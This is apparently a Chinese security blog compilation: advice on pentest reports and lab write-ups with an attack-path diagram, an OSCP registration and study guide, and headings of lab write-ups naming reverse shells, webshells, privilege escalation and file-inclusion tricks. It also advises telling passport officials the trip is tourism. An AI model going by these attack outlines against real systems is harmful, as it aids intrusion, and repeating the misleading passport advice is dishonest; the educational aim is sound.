此外，Word 模板通常还会要求绘制攻击路径图。如果你渗透了一个较大的内网，并通过突破的边界作为跳板在内网中横向移动，那么绘制一张清晰的攻击路径图显得尤为重要。这张图需要展示从哪个节点进入，接着又进入了哪个节点，然后是下一步进展到的新节点。

如果你在 Markdown 编辑器中工作，我建议使用 Mermaid 语法 来简单描述攻击路径。VScode 和 Typora 都支持 Mermaid 语法，能够将其渲染为流程图，并支持将其保存为图片。如果攻击路径节点较为复杂或庞大，建议使用专业的流程图绘制工具，比如 draw.io 等，来绘制更清晰、专业的攻击路径图。

例如，使用 Mermaid 语法可以创建一个简单的攻击路径流程图：

1graph LR
2 A[外部攻击者] --> B[扫描开放端口]
3 B --> C[发现开放的 RDP 端口]
4 C --> D[暴力破解 RDP 密码]
5 D --> E[获得管理员权限]
6 E --> F[横向渗透到其他系统]
7 F --> G[执行恶意操作]
8 G --> H[清理痕迹]

graph LR
 A[外部攻击者] --> B[扫描开放端口]
 B --> C[发现开放的 RDP 端口]
 C --> D[暴力破解 RDP 密码]
 D --> E[获得管理员权限]
 E --> F[横向渗透到其他系统]
 F --> G[执行恶意操作]
 G --> H[清理痕迹]

到这一步，渗透测试的报告撰写工作基本完成了。对于大多数红队队员来说，主要的任务还是攻破目标、执行测试，而不是花费大量时间在写一份美观的报告上。本文中提到的“美观漂亮”并不是指像老学究那样精雕细琢，而是指报告要便于不同部门的使用和理解。实际上，在渗透测试的实际工作中，重点是清晰、简洁、有效的传达测试结果，而不是追求格式的完美。

在一些专业的测试场合，甲方或紫队会提供专用的测试监控软件，这些软件通常包括以下功能：监控摄像头、桌面截图、网络流量监控（特别是在涉及到保密测试时，需要注意避免连接外网），靶标单位发放（有些类似CTF赛事中的“放题”机制）、成果提交、非授权攻击行为提交等。更智能的是，许多此类工具会自动生成报告，并按节点组织，只需要简单填写相关内容（如复制之前的测试文字内容），软件就能自动生成结构化的报告。

然而，即便是自动生成的报告，通常也需要经过多轮审核和修改。首先，队长或负责人会对报告进行初步审核，随后销售、财务、文员等人员也会参与审核，最后可能还会有专家审核。在这个过程中，报告的格式会被调整和美化，以确保它符合公司或甲方的需求，最终用于财务报账、开具发票等事务。所以，作为渗透测试人员，我们不必过于纠结报告的美观和格式，而应更专注于测试的本质和结果的准确性。

总之，报告的结构、内容、清晰度是最重要的，格式问题可以交给后期的审批和修改过程来解决。最重要的是写清楚：网址、漏洞名称、泄露资产、待清理文件/路径、POC。

日常靶机练习的WP写作方法

与上一段渗透测试报告的写法类似，只是不需要写目标单位，泄露资产和建议意见。以下是一个模板：

活动描述：描述漏洞或攻击场景。
靶机环境描述：例如 XXX 系统（最好标明靶机有什么特征，比如某端口开放，用了什么组件，方便以后复盘或者遇到相似情况，直接看曾经的WP参考了直接打）。
网址：http://www.example.com/login.php
漏洞名称：例如 Windows 远程执行漏洞 或 CVE-2024-38077（如果有 CVE 编号，优先填写编号；如果没有 CVE 编号，使用最广泛的漏洞名称）。
flag：写flag的截图或者flag值（截图最好包含flag文件路径）
执行 PoC：（可选，如果使用了某个工具，需填写工具名称并附上截图；如果是自编 PoC，无论是 HTTP 请求头还是其他攻击载荷，都应完整写出 PoC，不能仅写关键路径，要将整个 PoC 内容写全）。

总结

总之，WP（工作报告）和渗透测试报告都是红队必备的技能，尽管它们在撰写过程中有所不同。WP通常是自己练习或测试时的记录，主要目的是为了学习和复盘，以便在未来的实战中遇到类似情况时，能够像参考菜谱一样迅速复现攻击手法。特别是在内网渗透中，靶机的标准性和容易程度往往比外网更高（内网里比靶机还靶机还标准的系统一抓一大把），因此在记录时应该尽可能详细，涵盖使用的工具、安装过程、攻击路径等细节。这类WP更多是为自己做的练习总结。

而对于CTF比赛或考试中的WP，则不需要过于详细。在这种情况下，重点是突出得分点和核心攻击路径，而不是逐步描述工具的安装过程或攻击的每个细节。CTF WP的目的是展示如何攻破某个特定环节并获取flag，因此只需要聚焦于关键工具、攻击路径和最终的flag，不必关注其他冗余细节。

渗透测试报告和CTF中的WP有些相似，都是针对甲方或考官的需求进行编写。报告的重点是展示你如何发现并利用漏洞，泄露了哪些数据，如何修复这些漏洞。此类报告不需要详细写出每一步的攻击细节，只需提供关键证据和漏洞分析，证明你作为红队在授权范围内成功渗透了目标系统，并给出相应的修复建议。重点是让甲方或考官了解漏洞的存在和影响，而不是“教会”他们如何防御，避免过多的细节（教会了甲方，饿死乙方）。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day1 什么是OSCP，怎么报名和如何准备

Wed, 15 Jan 2025 16:13:45 +0000

什么是OSCP

OSCP（Offensive Security Certified Professional）是由 Offensive Security 推出的渗透测试认证考试，是全球最受认可、含金量最高的渗透测试认证之一。其配套课程 PWK（Penetration Testing with Kali Linux）专为希望成为渗透测试专家的安全专业人士设计。课程内容侧重于使用 Kali Linux 系统进行渗透测试，帮助学员全面理解网络攻击的技术和手段。

OSCP 认证面向的群体主要是系统管理员、安全工程师以及那些有志于从事渗透测试工作的专业人士，无论你是刚入行的安全服务工程师，还是希望提升自己技术水平的中高级红队成员，OSCP 都是进入渗透测试领域的理想选择。

通过参加 OSCP 培训，你将获得关于渗透测试的深入知识，学习如何发现、利用漏洞并进行完整的渗透测试，帮助你从专业角度理解和应对网络安全威胁。作为业界最具历史和影响力的认证之一，OSCP 培养的渗透测试技能被广泛应用于各种安全服务和防护措施中，是进入高级网络安全领域的关键一步。

国外相似认证

在网络安全领域，除了 OSCP（Offensive Security Certified Professional） 认证，还有很多其他类似的渗透测试和网络安全认证。以下是几个知名的认证及其与 OSCP 的对比：

1. CEH（Certified Ethical Hacker）

认证机构：EC-Council
认证目标：CEH 旨在培养能够合法攻击系统的道德黑客，通过模拟网络攻击来评估和加强系统的安全性。
课程内容：CEH 提供的知识涉及网络攻击、扫描工具、漏洞分析、社会工程学等内容。
与 OSCP 的对比：
- 难度与实践：OSCP 更注重实践，要求考生完成实际的渗透测试，并通过挑战性的实际操作来完成认证；而 CEH 更侧重理论，考试是选择题，内容更广泛，适合入门级的安全从业者。
- 认证目标：OSCP 主要是面向那些希望深入渗透测试的人员，CEH 适合初学者及更注重知识广度的安全人员。

2. CPT (Certified Penetration Tester)

认证机构：IACRB（International Association of Computer Security Professionals）
认证目标：CPT 是一项侧重渗透测试的认证，要求考生展示他们在不同渗透测试场景中的能力。
课程内容：CPT 涵盖了渗透测试的各个方面，包括漏洞扫描、网络攻击、Web 渗透、无线网络安全等。
与 OSCP 的对比：
- 实战性：OSCP 更侧重实际操作和渗透测试，强调通过 Kali Linux 工具进行的攻防对抗，而 CPT 同样关注渗透测试技能，但课程内容更宽泛，可能缺少 OSCP 那种“手把手”实践的深度。
- 难度：OSCP 的考试要求考生完成一系列真实环境中的渗透测试任务，而 CPT 的考试可能更多关注特定知识点的测试。

3. GPEN（GIAC Penetration Tester）

认证机构：SANS Institute
认证目标：GPEN 认证旨在验证考生在渗透测试中的实际技能，尤其是在漏洞扫描、利用漏洞和报告方面的能力。
课程内容：GPEN 课程包括渗透测试的技术细节，如漏洞扫描、Web 安全、无线渗透测试等。
与 OSCP 的对比：
- 理论 vs 实践：OSCP 更加注重实践和攻防实操，要求在考试中通过实践完成渗透测试任务，而 GPEN 的课程在理论与实践的平衡上略微偏重理论，考试也包含理论知识测试。
- 难度：OSCP 是一个非常注重挑战性的认证，要求考生对渗透测试有深入的理解和实践经验。相比之下，GPEN 的认证更注重从攻防对抗的全局角度理解渗透测试，难度较为适中。

4. ECSA (EC-Council Certified Security Analyst)

认证机构：EC-Council
认证目标：ECSA 认证专为已经有一定渗透测试经验的人员设计，重点培训如何分析渗透测试的结果，并提供深入的报告分析。
课程内容：包括漏洞评估、网络渗透测试、Web 渗透测试、无线渗透等，并要求考生能够有效地分析、评估和汇报渗透测试结果。
与 OSCP 的对比：
- 侧重点不同：OSCP 更侧重渗透测试的实际操作和技术应用，而 ECSA 更侧重渗透测试的分析和报告部分，适合那些希望从事安全分析、渗透测试评估工作的专业人员。

5. PNPT (Practical Network Penetration Tester)

认证机构：TCM Security
认证目标：PNPT 专为渗透测试人员设计，目标是评估其在进行网络渗透测试时的技术能力。
课程内容：PNPT 强调网络渗透测试的实际技能，包括信息收集、漏洞扫描、攻击方法、利用漏洞等。
与 OSCP 的对比：
- 考试方式：PNPT 同样以实际操作为基础，考生需在规定的时间内完成网络渗透测试任务，类似于 OSCP 的考试模式，实操性较强。
- 难度：PNPT 的考试也非常重视实战操作，但相比 OSCP，它的难度和挑战性可能略低一些，适合那些初步进入渗透测试领域的人。

总结对比：

实践性： OSCP 是目前渗透测试认证中最注重实际操作的认证之一，考生必须通过一系列挑战性的渗透测试任务。其他认证（如 CEH、GPEN、ECSA）相较之下，可能更多依赖理论考试和知识点评估。
难度： OSCP 被认为是最具挑战性的渗透测试认证之一，尤其适合那些有一定经验的安全专业人士。CEH 相对简单一些，更适合初学者。
适用群体： 如果你希望成为一名渗透测试专家或红队成员，OSCP 是最理想的选择；而 CEH 和 GPEN 适合那些希望全面了解网络安全的人员，特别是针对不同的安全分析和管理方向。
认证含金量： OSCP 和 GPEN 都是国际上非常知名且认可度高的认证，但 OSCP 更侧重渗透测试技术，含金量可能稍高于其他认证。

中国国内相似认证

1. CISP (注册信息安全专业人员)

认证机构：中国信息安全评测认证中心（CNITSEC）
认证目标：CISP 是中国信息安全行业的一项国家级认证，旨在提升信息安全技术人员的专业能力。包括专门的 CISP 渗透测试工程师认证，侧重渗透测试、漏洞分析和网络攻防技术。
课程内容：渗透测试的基本技术、漏洞利用、信息收集、攻击与防御、网络安全策略等。考生需掌握实际的渗透测试技能，并能够处理网络安全问题。
与 OSCP 的对比：
- 相似点：CISP 渗透测试认证强调实践，考生需掌握渗透测试技术和攻击防御策略。
- 区别：CISP 更加注重中国本土的网络安全标准和政策，认证范围较广，除了渗透测试外，还涵盖其他信息安全领域。

2. CWAPT (Certified Web Application Penetration Tester)

认证机构：中国网络安全审计中心（CCSA）
认证目标：CWAPT 认证专注于 Web 渗透测试，即测试和攻击 Web 应用程序的安全性。
课程内容：涵盖 Web 应用的漏洞识别、利用漏洞进行攻击、SQL 注入、XSS、CSRF 等常见漏洞的测试和攻击方法。该认证强调攻击与防护，并通过实战测试评估技术能力。
与 OSCP 的对比：
- 相似点：CWAPT 与 OSCP 都注重实际操作，要求考生能够在真实环境中进行渗透测试，并使用合适的工具进行攻击。
- 区别：CWAPT 主要针对 Web 安全进行认证，范围较为狭窄，专注于 Web 应用的渗透测试，而 OSCP 包含更广泛的渗透测试技能。

3. CPT (Certified Penetration Tester)

认证机构：中国网络安全认证中心（CNSA）
认证目标：CPT 是一种针对渗透测试的技术认证，旨在通过严格的考试，评估考生在渗透测试领域的实际操作能力和知识储备。
课程内容：渗透测试的各个方面，包括信息收集、漏洞扫描、利用漏洞、Web 渗透、密码破解等技术，考生需要掌握常见的渗透测试技术和工具。
与 OSCP 的对比：
- 相似点：CPT 与 OSCP 都注重实战操作，考生需要在特定的渗透测试环境中完成任务，并提交结果。
- 区别：CPT 认证的重点在渗透测试技术上，但没有 OSCP 那样严格的挑战性和综合的渗透测试流程，考试难度相对较低。

4. PET (Penetration Tester)

认证机构：中国信息安全技术认证中心（CICT）
认证目标：PET 认证专门针对渗透测试人员，旨在测试考生在各种渗透测试任务中的综合能力，涵盖从信息收集到攻击、利用漏洞、报告撰写等多方面技能。
课程内容：包括渗透测试的基础知识、漏洞分析、网络渗透、Web 安全、密码学等技术，侧重实际操作并提供现场考试。
与 OSCP 的对比：
- 相似点：PET 认证与 OSCP 相似，注重考生的实战技能，考试中要求完成渗透测试任务，并解决实际问题。
- 区别：PET 可能较为基础，适合初级渗透测试工程师，而 OSCP 适合有一定渗透测试经验并希望进一步提升的中高级安全从业人员。

总结对比：

OSCP 是全球最具权威的渗透测试认证之一，深度涵盖渗透测试的各个方面，认证的难度较高，适合有一定渗透测试基础的人员。它侧重于考察考生在真实环境中的问题解决能力和综合应用能力。
国内认证 如 CISP、CWAPT、CPT 和 PET，虽然也涵盖渗透测试的技能，但它们通常在认证内容上更贴合中国的网络安全需求，注重国家标准和法规。部分国内认证的考试难度相对较低，更适合入门级或中级人员。

怎么报名

如何报名参加 OSCP（Offensive Security Certified Professional）认证

OSCP 是由 Offensive Security 提供的全球公认的渗透测试认证，报名流程相对简单，但需要经过一系列步骤。以下是报名 OSCP 认证的详细过程：

1. 准备工作

在报名之前，你需要具备一定的技术基础，特别是在渗透测试和网络安全方面。Offensive Security 官方建议，参与 OSCP 考试之前，考生应当具备以下技能：

熟练掌握 Kali Linux 系统（至少要自己会装个虚拟机）
熟悉 网络协议、TCP/IP、HTTP 等基础知识
掌握 漏洞扫描、漏洞利用、Web 渗透测试、密码破解 等技术（大学生CTF赛事有相关培训，建议先学习CTF部分的知识入门后再考虑考证）

2. 选择培训课程（可选）

虽然可以直接报名参加 OSCP 认证考试，但很多考生会选择参加 PWK（Penetration Testing with Kali Linux） 课程，这是 OSCP 官方提供的认证配套培训课程。通过参加该课程，学员可以系统地学习渗透测试的技术和方法，涵盖了从基础到高级的各种渗透测试技术。

培训网站：Offensive Security Training
课程包括视频教程、实践环境、工具使用指导等内容。
课程费用通常为 800-1000 美元（具体费用请参考官网）。

参加 PWK 课程后，学员可以获得 90 天 的实验室环境访问权限，并且可以进行实践操作。

3. 注册并创建帐户

访问 Offensive Security 官方网站：https://www.offensive-security.com
点击页面顶部的 “Get Started” 或 “Training”，然后选择 OSCP 或 PWK 课程。
创建一个账号，输入基本的个人信息和联系方式。
注意，创建账号不需要护照，可以先注册账户，但是不要付款买90天课程，因为90天你自己绝对刷不完官方靶机，先跟着泷羽Sec的课程，先学习，刷免费练习靶机，都刷完之后再去买官方课程和靶机练习，然后考试。

4. 选择考试套餐

OSCP 提供了两种主要的报名套餐：

基础套餐（Basic）：包括 PWK 培训课程和 30 天实验室环境访问。
标准套餐（Standard）：包括 PWK 课程、90 天实验室环境访问以及认证考试。

在选择套餐时，如果你已经有一定渗透测试经验，可以选择基础套餐；如果你需要更多的实验室时间来提高实践技能，建议选择标准套餐。

注意，这个价格按照成文当日汇率约为1万2左右，请不要先行购买付款，可以注册，但是不要付款。因为付款后只有90天的使用时长，纯小白90天学不会的。建议先跟着泷羽Sec的课程，先学习，刷免费练习靶机，都刷完之后再去买官方课程和靶机练习，然后考试。

注意3年有效期意思为，刚考完试的时候是OSCP+，有+号，3年后如果不维持（交钱），自动降级为OSCP，没有加号。OSCP（没有加号），是终生永久的，不用年年交钱，也不用年年考试。OSCP的认证（没有加号）目前来说含金量已经非常够了，红队招聘基本可以横着走了（bushi）。至于以后是否维持+号，自行看钱包决定，目前国内没有区分+号和没有+号在招聘上的限制。

5. 付款并完成报名

选择合适的课程套餐后，按照提示完成付款。一般来说，PWK 课程和 OSCP 认证费用相对较高，具体价格根据所选套餐和实验室时长不同，通常在 800 至 1400 美元之间。
支付完成后，你将获得 登录凭证 和 实验室环境访问权限，可以开始进行课程学习和练习。

6. 参加考试

在完成 PWK 课程学习后，你可以通过官网 预约考试。OSCP 的考试形式为：

24小时渗透测试实战：考生需要在 24 小时内完成渗透测试任务，达到一定的分数后提交报告。
考生需要根据给定的目标网络环境，通过渗透测试，获取管理员权限并提交报告。
完成考试后，需要提交详细的 渗透测试报告，报告内容需包括漏洞分析、攻击步骤、缓解措施等。

考试通过标准：

必须获得至少 70% 的分数（即 1000 分中的 700 分）才能通过考试。
提交考试报告后，Offensive Security 会对你的测试过程和结果进行评估。

7. 获取证书

如果通过考试，你将收到 OSCP 证书，这是一项国际认可的渗透测试认证，能够显著提升你在网络安全领域的职业竞争力。（拿证需要护照，护照申请方法在后面）

https://www.offsec.com/checkout/ offsec全套认证列表，以后进阶红高可能要OSEP。不过也是先考了OSCP再说.

小贴士：

准备工作：OSCP 的考试有一定难度，建议考生在报名之前进行充分的学习和实践，熟悉常用的渗透测试工具（如 Metasploit、Nmap、Burp Suite 等）。注意，官方考试时 Metasploit 只允许用一次，需要向考官申请；Burp Suite 只能用社区版，不能用带 Pro的版本。
实验室环境：PWK 课程提供的实验室环境是非常重要的，充分利用它来进行各类渗透测试练习。
报告撰写：OSCP 考试不仅仅是完成渗透测试，还需要提交一份详尽的报告。报告写作同样是考试的一部分，清晰、有条理的报告能够帮助你提高分数。
单独考试:Offsec官方有单独OSCP+仅考试的选项,1699美元,综合下载还是1799美元套餐(考试+课程+90天靶机环境)比较划算.

办理护照

前往 公安局 或 政务中心办事大厅 找民警办理，携带身份证 即可。到办事处时，说 “办理护照，美国”，出国理由直接回答 “旅游”。即使民警再次询问确认目的是否是出国旅游（只是办事流程再次确认的环节），也必须回答是，不要提学习或考试，否则材料会更复杂。办理的为 普通护照，同样适用于OSCP考试等其他用途。

办理流程：

登记基本信息：携带身份证进行登记。
询问目的地：只需回答目的地为美国，理由为旅游。
拍摄护照照片：拍照时请穿深色衣服，避免佩戴头饰、眼镜，确保耳朵露出，不要化妆，基本要求与身份证照相同。
缴纳费用：缴纳工本费 120元，并提交相关材料。你可以选择 免费邮寄到家 或 到大厅领取，不需要支付额外的邮费。

普通护照有效期为 10年，整个办理过程大约需 15分钟，一般在 7个工作日 内可以领取护照，会通过电话或短信通知你。

办理 PayPal 支付

在中国，办理 PayPal 账户并非直接通过银行进行，而是通过 PayPal 官方网站或移动应用注册并完成身份验证。然而，如果你希望通过中国的银行进行一些与 PayPal 相关的操作（如绑定银行账户、进行提现等），你可以按照以下步骤进行：

1. 注册 PayPal 账户

步骤：
1. 访问 PayPal官网或下载 PayPal 移动应用。
2. 点击“注册”按钮，选择个人账户或商家账户（通常个人用户选择个人账户）。
3. 填写个人信息（如姓名、电子邮件地址、密码等）。
4. 选择中国大陆为账户所在地区。
注意：在中国，PayPal 账户注册时需要绑定有效的电子邮件地址和手机号码(电信可用)，确保账户安全。

2. 绑定银行账户

选择合适的银行：PayPal 支持中国大陆的大部分银行账户，通常可以绑定 工商银行、建设银行、农业银行、招商银行等主流银行的借记卡或信用卡。
步骤：
1. 登录到 PayPal 账户后，进入“钱包”页面。
2. 点击“关联银行账户或卡片”。
3. 输入你的银行账户信息，通常是银行卡号、卡类型、银行名称等。
4. PayPal 会进行验证并要求你输入银行账户的验证码（通过短信发送或通过网银进行验证）。
注意：你绑定的银行卡必须支持国际支付（如 Visa、Mastercard 等卡种）。中国的部分银行可能会限制外币支付，所以确保你的银行卡可以进行国际交易。(普通借记卡不行,必须要新办一张支持Paypal支付的卡,详细询问银行员工)

3. 完成身份认证

为了增强账户安全并完成某些交易，PayPal 可能会要求你进行身份认证。通常包括：
- 提供身份证照片或其他身份证明。
- 提供银行账户的验证信息。
- 确保你的 PayPal 账户与银行账户的信息一致。
备注：完成身份认证后，你将可以进行更多的操作，如接收国际付款、进行汇款等。

4. 进行 PayPal 交易和提现

接收付款：完成账户和银行绑定后，你可以通过 PayPal 收取来自全球用户的款项。
提现到银行：当你需要将 PayPal 账户中的余额提现到银行账户时，选择“提现”选项，输入银行账户信息并确认提现操作。

5. 通过支付宝账户充值或付款（可选）

在某些情况下，你也可以通过 支付宝 向 PayPal 账户充值或进行支付。这需要第三方平台进行中介操作，步骤比较复杂。

6. 费用和汇率

在中国进行 PayPal 交易时，PayPal 会收取一定的手续费，具体费率可以参考 PayPal的费用说明页面。
汇率问题：PayPal 会根据国际市场汇率进行货币转换，可能会有一些汇率差异。

因为考试费用的金额太大，所以建议你使用自己的卡办自己的Paypal，能保证资金安全．不建议使用发卡平台等魔法工具转账．

如何高效备考 OSCP？——从基础到考试的一站式攻略

OSCP（Offensive Security Certified Professional）是网络安全领域最具挑战性的认证之一，要顺利通过考试，除了理论学习，还需要大量的实战练习。以下是高效备考的建议，希望你能充分准备并顺利通过。

1. 打好基础，系统学习

在正式进入 OSCP 的备考之前，建议从基础学习开始，夯实渗透测试的核心知识。你可以通过关注泷羽Sec 提供的课程，结合 免费靶机练习，逐步提升实战能力。
基础靶机练习完成后，考虑购买 Offensive Security 提供的官方课程和靶机，进一步深入，进行更为高级的练习。

2. 深入学习路径

直播课程+官方教材：配合 Offensive Security 的官方 PWK 24 章节教程和直播课程，确保对渗透测试各项技能掌握扎实。这是基础，也是整个学习路径的支撑。
实战靶机刷题：首先可以挑战 Top 10 基础靶机，巩固渗透测试的基础技能，接着刷 100 平替靶机，为中级挑战做准备。
进阶靶机训练：逐步过渡到更复杂的环境——刷官方的 进阶 PG 靶场，这将帮助你熟悉 OSCP 考试中的高级渗透技巧和策略。
- 官方 PG 靶场链接

3. 报名官方靶场，进行实战模拟

训练到一定阶段，建议报名 OSCP 90 天实验室靶场（OSCPLab），这是官方提供的封闭式练习环境，可以帮助你进行全面的攻防训练，模拟真实考试的场景。
提前报名并完成足够的练习，是确保考试顺利通过的关键。

4. 临考准备，冲刺复习

在积累了一定的实战经验后，准备进入最后的考试复习阶段。回顾你做过的靶机，强化弱项，确保自己能够应对 OSCP 考试中的各种挑战。

小贴士：关注学习资源，持续跟进最新动态

为了让你在备考过程中少走弯路，不妨关注 泷羽Sec-静安公众号，这里会定期更新 OSCP 相关学习文章，从渗透测试技巧到备考经验，帮助你更高效地掌握核心内容。或在 CSDN 泷羽Sec-静安 的 OSCP 栏目查阅更多实战经验和技巧，时刻保持更新，走在行业的前沿。

👉 长按或扫描二维码关注公众号，后台回复关键字　OSCP　获取免费备考资料．

备考路线总结：

学习基础课程，理解核心知识（直播、官方教程、基础靶机）
深入练习，刷中高级靶机（100 平替靶机、官方进阶 PG 靶场）
加入官方 90 天靶场，进行实战模拟
冲刺复习，确保各项技能熟练
最终考试，挑战自己，突破极限

通过这些层层递进的学习和练习，你的 OSCP 之路将更加顺利。希望你早日获得认证，成为渗透测试领域的专业人士！

渗透测试 on 静静的安全笔记

OSCP官方靶场 Readys WP

信息收集

扫描端口和目录

site-editor插件漏洞

Redis-RCE 漏洞反弹shell

文件权限php一句话木马

tar提权

总结

入侵路径示意图

入侵时间表

OSCP官方靶场 Peppo WP

信息收集

扫描端口和目录

SSH密码爆破

rbash逃逸

提权

总结

入侵路径示意图

入侵时间表

补充知识点-Docker提权

🔧 命令分解：

🚀 为什么能获得 root 权限：

⚠️ 安全风险：

🔒 系统管理员应该：

OSCP官方靶场 Clue WP

信息收集

扫描端口和目录

Cassandra 远程文件读取漏洞

freeswitch命令执行漏洞

反弹Shell

内网信息收集

提权root

总结

入侵路径示意图

入侵时间表

有哪些容易泄露配置信息的文件？

🔍 ​​一、系统关键文件（Linux/Unix）​​

💻 ​​二、应用敏感文件​​

📂 ​​三、动态信息与日志文件​​

⚙️ ​​四、特殊路径与内存文件​​

🎯 ​​五、针对Java应用的专项读取​

🛡️ ​​防御规避与注意事项​​

💎 ​​总结：优先级策略​​

find命令的妙用

🔍 ​​优化后的查找命令​​

⚙️ ​​进阶场景优化​​

1. ​​限制搜索深度（减少扫描范围）​​

2. ​​组合条件搜索（时间/大小过滤）​​

3. ​​权限/所有者过滤​​

💡 ​​替代方案（更高效率）​​

使用 locate命令（需先更新数据库）：

⚠️ ​​注意事项​​

📊 ​​命令执行效果对比​​

为什么root可以登录成功而Anthony用户无法用密钥登录？

⚠️ ​​核心原因分析​​

✅ ​​为何 root用户能成功？​​

🔧 ​​解决方案​​

⚠️ ​​无法登录的原因​​

🔧 ​​解决方案：为 anthony用户创建 authorized_keys​​

步骤 1：创建文件并添加公钥内容

步骤 2：设置严格的文件权限

步骤 3：验证 SSH 配置（可选）

✅ ​​验证登录​​

📌 ​​关键注意事项​​

OSCP官方靶场 Nukem WP

信息收集

扫描端口和目录

WP插件漏洞

内网信息收集

总结

入侵路径示意图

入侵时间表

OSCP官方靶场 Snookums WP

信息收集

扫描端口和目录

文件包含漏洞

Simple PHP Photo Gallery 漏洞

内网信息收集

总结

🔍 一、系统关键文件（Linux/Unix）

💻 二、应用敏感文件

📂 三、动态信息与日志文件

⚙️ 四、特殊路径与内存文件

🎯 五、针对Java应用的专项读取

🛡️ 防御规避与注意事项

💎 总结：优先级策略

🔍 优化后的查找命令

⚙️ 进阶场景优化

1. 限制搜索深度（减少扫描范围）

2. 组合条件搜索（时间/大小过滤）

3. 权限/所有者过滤

💡 替代方案（更高效率）

使用 `locate`命令（需先更新数据库）：

⚠️ 注意事项

📊 命令执行效果对比

⚠️ 核心原因分析

✅ 为何 `root`用户能成功？

🔧 解决方案

⚠️ 无法登录的原因

🔧 解决方案：为 `anthony`用户创建 `authorized_keys`

✅ 验证登录

📌 关键注意事项

📁 一、本地文件包含（LFI）基础利用

🌐 二、伪协议高级利用

🔧 1. `php://filter`（源码泄露）

⚡ 2. `php://input`（代码执行）

📦 3. 压缩协议（绕过上传限制）

💥 4. `data://`（直接代码执行）

🎯 三、远程文件包含（RFI）

⚙️ 四、环境变量与临时文件

🛠️ 五、绕过过滤技巧

💎 总结

🔍 深入解析 tcpdump 中的 `src` 和 `dst` 参数

1. `src host 192.168.1.176`

2. `dst host 192.168.1.176`

🕵️♂️ 深入解析 `pspy64` 工具的使用方法